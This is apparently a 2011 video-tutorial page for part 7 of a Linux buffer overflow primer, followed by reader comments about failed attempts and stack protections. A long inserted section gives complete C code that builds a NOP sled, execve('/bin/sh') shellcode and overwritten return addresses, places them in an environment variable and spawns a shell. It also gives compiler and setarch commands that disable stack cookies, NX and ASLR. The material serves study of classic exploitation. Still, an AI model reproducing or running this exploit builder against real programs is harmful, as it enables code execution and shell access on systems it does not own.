Buffer Overflow Primer Part 7 (Exploiting A Program Demo)

Posted By: SecurityTube_Bot
Posted On: Mon 21 Feb 2011
Views: 10668

Description: Welcome to Part 7 of the Buffer Overflow Primer. If you have not already done so, please start this series by viewing Part 1. The Buffer Overflow Primer requires that you know at least some basic Assembly Language. For those not familiar with the language, I have created a series of Assembly Language video tutorials for hackers here.

In this video we do a buffer overflow exploitation demo using HackYou.c and ExploitMe.c. We first run HackYou, which places the shellcode in the environment variable EGG. We then invoke ExploitMe with $EGG as its input. The oversized input overwrites the stack of ExploitMe, planting our shellcode on the stack and replacing the saved return address (RET) with a pointer to that shellcode. When main() returns, control transfers to our shellcode, which, as expected, spawns a shell :) It is important to note that in this video there are no stack protection mechanisms such as NX or ASLR in play. We will deal with how to exploit the stack in the presence of these protections in later videos.
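The following is an added example, not the page's HackYou.c or ExploitMe.c (neither is shown here). It builds the kind of payload the description talks about, so that what actually ends up in $EGG is explicit: a NOP sled, then the shellcode, then the chosen return address repeated little-endian from the offset of the saved EIP slot onwards. The distance from the vulnerable buffer to the saved EIP (`dist`) and the return address (`ret`) are assumed placeholders to be read from gdb on the actual target; the 23-byte execve("/bin/sh") shellcode is the standard x86-32 one and is never executed by this code. The example also adds two checks a practitioner wants before running the target: that the payload contains no NUL byte (strcpy() would stop there) and that the guessed return address falls inside the sled.

```c
/*
 * Added example: build a classic x86-32 stack-overflow payload and plant it
 * in the environment variable EGG. Not the original HackYou.c.
 *
 * Payload layout (low address -> high address):
 *
 *   [ NOP sled ][ shellcode ][ ret ][ ret ][ ret ] ...
 *               ^                  ^
 *               offset dist-23     offset dist = saved EIP slot
 *
 * `ret` only has to land somewhere inside the sled, not exactly on the
 * shellcode, which is why the sled is there.
 *
 * Assumptions: 32-bit x86 Linux, no ASLR, executable stack, no stack
 * cookies, and a target that strcpy()s argv[1] into a fixed stack buffer.
 * dist and ret below are placeholders; read the real values from gdb.
 */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define NOP 0x90

/* Standard 23-byte x86-32 execve("/bin/sh") shellcode; contains no NUL. */
static const unsigned char shellcode[] =
    "\x31\xc0"                  /* xor  eax, eax             */
    "\x50"                      /* push eax        ; "\0"    */
    "\x68\x2f\x2f\x73\x68"      /* push "//sh"               */
    "\x68\x2f\x62\x69\x6e"      /* push "/bin"               */
    "\x89\xe3"                  /* mov  ebx, esp   ; path    */
    "\x50"                      /* push eax        ; envp=0  */
    "\x53"                      /* push ebx        ; argv[0] */
    "\x89\xe1"                  /* mov  ecx, esp   ; argv    */
    "\xb0\x0b"                  /* mov  al, 11     ; execve  */
    "\xcd\x80";                 /* int  0x80                 */
#define SHELLCODE_LEN (sizeof(shellcode) - 1)

/*
 * Write sled + shellcode + nrets copies of ret into out (capacity cap).
 * dist is the byte distance from the start of the overflowed buffer to the
 * saved EIP slot, so the first copy of ret lands exactly on it. Returns the
 * payload length (a terminating NUL is added after it), or 0 on bad input.
 */
size_t build_payload(unsigned char *out, size_t cap, size_t dist,
                     size_t nrets, uint32_t ret)
{
    size_t total = dist + 4 * nrets;
    if (dist < SHELLCODE_LEN || nrets == 0 || total + 1 > cap)
        return 0;

    size_t sled = dist - SHELLCODE_LEN;
    memset(out, NOP, sled);
    memcpy(out + sled, shellcode, SHELLCODE_LEN);
    for (size_t i = 0; i < nrets; i++) {
        unsigned char *p = out + dist + 4 * i;   /* little-endian EIP value */
        p[0] = ret & 0xff;
        p[1] = (ret >> 8) & 0xff;
        p[2] = (ret >> 16) & 0xff;
        p[3] = (ret >> 24) & 0xff;
    }
    out[total] = '\0';
    return total;
}

/* strcpy() stops at the first NUL, so a ret such as 0xbffff400 truncates. */
int payload_is_strcpy_safe(const unsigned char *p, size_t n)
{
    for (size_t i = 0; i < n; i++)
        if (p[i] == 0)
            return 0;
    return 1;
}

/* Does ret point into the sled (or exactly at the shellcode start)? */
int sled_covers(uint32_t buf_addr, size_t dist, uint32_t ret)
{
    if (dist < SHELLCODE_LEN || ret < buf_addr)
        return 0;
    return (ret - buf_addr) <= dist - SHELLCODE_LEN;
}

int main(int argc, char **argv)
{
    size_t   dist = 64;          /* placeholder: buffer -> saved EIP       */
    uint32_t ret  = 0xbffff410;  /* placeholder: an address inside the sled */
    if (argc > 1) dist = strtoul(argv[1], NULL, 0);
    if (argc > 2) ret  = strtoul(argv[2], NULL, 0);

    unsigned char egg[4096];
    size_t n = build_payload(egg, sizeof egg, dist, 8, ret);
    if (n == 0 || !payload_is_strcpy_safe(egg, n)) {
        fprintf(stderr, "bad layout or NUL byte in payload\n");
        return 1;
    }
    /* Plant the payload in EGG and drop into a shell that inherits it. */
    setenv("EGG", (char *)egg, 1);
    execl("/bin/sh", "sh", (char *)NULL);
    perror("execl");
    return 1;
}
```

From the shell that this spawns, the target is then run as in the video, `./ExploitMe $EGG`. On a current distribution the no-protections setup the video assumes has to be recreated deliberately: build the target with `gcc -m32 -fno-stack-protector -z execstack` and run it under `setarch i386 -R` to switch ASLR off for that process; the commenters below who hit stack cookies were running a default build.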





Tags: tools

This video is part of the following groups:

1. Buffer Overflow Exploitation Megaprimer for Linux ( 9 videos)


Comments (13)

xplt on Wed 02 Mar 2011

You're the best! =D

xplt on Wed 02 Mar 2011

I forgot to ask you something. Why doesn't this work on Ubuntu 9.10? Is that because Ubuntu manages the stack differently than Slackware? I tried executing the programs with SSP disabled, but it still didn't work.

Vivek-Ramachandran on Wed 02 Mar 2011

I'd probably have to check what mitigations that specific version of Ubuntu ships by default, but it could be anything: DEP, ASLR, stack cookies, etc. In some circumstances, some or all of these protections can be bypassed.

Have a look at the Exploit Research Megaprimer in progress. I will be covering these topics in more depth there.

Col_Loki on Sat 30 Apr 2011

Brilliant. Looking forward to finishing this series tomorrow.
Many thanks.

escube on Sat 04 Jun 2011

Hi Vivek, and Hi to everybody.
First of all I really want to thank you for your videos; I'm studying them and they are of really good quality.

I've tried out your example.
The first time it didn't work because I had a protection in my BackTrack compiler. Thanks to s0ttle at the link http://www.smashthestack.org/viewtopic.php?id=388
I discovered I had Stack Smashing Protection (SSP) / ProPolice, so I disabled it.

Still doesn't work.
It seems the layout of my stack is different from the stack in yours.

I've watched your other videos on exploitation and I saw you usually put the payload (shellcode) after the return address and not before.
It seems to me that putting the payload before the return address is going to make things a bit more difficult than putting it after.

Could you tell me why you chose to put the payload before the ret address, so I can understand what the purpose of this is?

Thanks again
Escube

3ntropy on Sat 18 Jun 2011

thank you for the tutorial, it was really excellent.

smartboy on Tue 12 Jul 2011

Thank you very much.

Josh on Sun 21 Aug 2011

So to find the return address, you just used the top of the stack? You surely cannot always do this, so how would you work out the return address otherwise?

By the way, amazing video series, and the assembly primer series too. I had a lot of trouble getting the stack for a long time, and now thanks to you I do. Many, many thanks, and please do continue.

kilgore on Sat 17 Sep 2011

Once again, thank you for the time and effort you've taken to share your knowledge.

The ambient background noises on the different series are interesting :) I've heard water dripping, gunshots, birds calling and I believe some frogs. I picture you in a hut in the middle of a jungle somewhere :)

t0ph4tter on Tue 18 Oct 2011

I am having some problems getting this to work. As you can see below, I have gotten ret to point back to esp:

# after injection
(gdb) x/24xw $esp
0xbffff410: 0xbffff418 0xbffff68f 0x6850c031 0x68732f6e
0xbffff420: 0x622f2f68 0x99e38969 0xe1895352 0x80cd0bb0
0xbffff430: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff440: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff450: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff460: 0x90909090 0x90909090 0x90909090 0xbffff410 # points back to shell code
# Is there a problem with ebp being overwritten?
# Is there a protection mechanism going on or am I just doing it wrong?
(gdb) x/1xw $ebp
0xbffff468: 0x90909090
(gdb) s
11 }
(gdb) s
Cannot access memory at address 0x90909094

t0ph4tter on Tue 18 Oct 2011

Thanks for the video by the way. Even though I haven't gotten it working, I feel like I understand the concepts a lot better.

Patcher on Wed 21 Dec 2011

@t0ph4tter same error, did you find a fix?

dikien on Sun 25 Dec 2011

Thank you. I failed because of security cookies... Now I'm figuring out what they are!!
But in your computer's situation, I can handle it!
